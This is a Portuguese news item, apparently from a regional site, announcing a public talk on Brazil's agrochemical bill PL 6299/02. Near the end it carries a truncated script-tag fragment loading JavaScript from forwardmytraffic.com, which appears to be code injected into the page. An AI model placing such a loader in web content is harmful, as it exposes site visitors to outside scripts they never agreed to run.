InícioDestaqueFórum de combate aos agrotóxicos debate PL do veneno

Fórum de combate aos agrotóxicos debate PL do veneno

Últimas notícias

PF cumpre mandados na casa de Jair Bolsonaro, que usará tornozeleira

A Polícia Federal cumpre na manhã desta sexta-feira (18) dois...

Em ação rápida polícia militar prende autor de furto em Canoinhas

Na tarde dessa quinta-feira, 17, por volta das 17h,...
- Anúncio -
Proposta sugere que agrotóxicos somente sejam proibidos quando apresentem “risco inaceitável”.

O Fórum Catarinense de Combate Aos Impactos dos Agrotóxicos e Transgênicos (FCCIAT) promoverá uma palestra para debater os pontos polêmicos do Projeto de Lei 6299/02, também conhecido como “PL do Veneno”.

 

 

O texto já foi aprovado nas comissões especiais da Câmara dos Deputados e está pronto para ser discutido em plenário. A palestra será ministrada durante reunião plenária do Fórum, na quarta-feira (24/10), a partir das 14 h no auditório do Ministério Público de Santa Catarina (MPSC).

 

 

As mudanças propostas no PL envolvem o uso, controle, registro e fiscalização dos agrotóxicos. O texto prevê alteração da nomenclatura de agrotóxico para defensivos fitossanitários. Se aprovado, o PL permitirá também a venda de agrotóxicos sem receita, em algumas situações, além de dar ao Ministério da Agricultura poder absoluto para autorizar a venda de um agrotóxico. Hoje, é necessária também aprovação da ANVISA e do IBAMA. O projeto de lei proíbe a comercialização apenas dos agrotóxicos que apresentem “risco inaceitável”, dando brecha para muitos produtos nocivos.

 

 

O palestrante será Cleber Adriano Rodrigues Folgado, autor da obra ”Direito e Agrotóxico: Reflexões críticas sobre o sistema normativo” e integrante do Fórum Nacional de Combate aos Impactos dos Agrotóxicos. O evento é aberto ao público e ao acompanhamento da imprensa.

… src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

- Anúncio -
Equipe Gazeta
Equipe Gazetahttps://gazetatresbarrense.com.br
Somos um jornal de notícias e classificados gratuitos. Estamos há 25 anos no mercado e nosso principal diferencial é o jornal digital.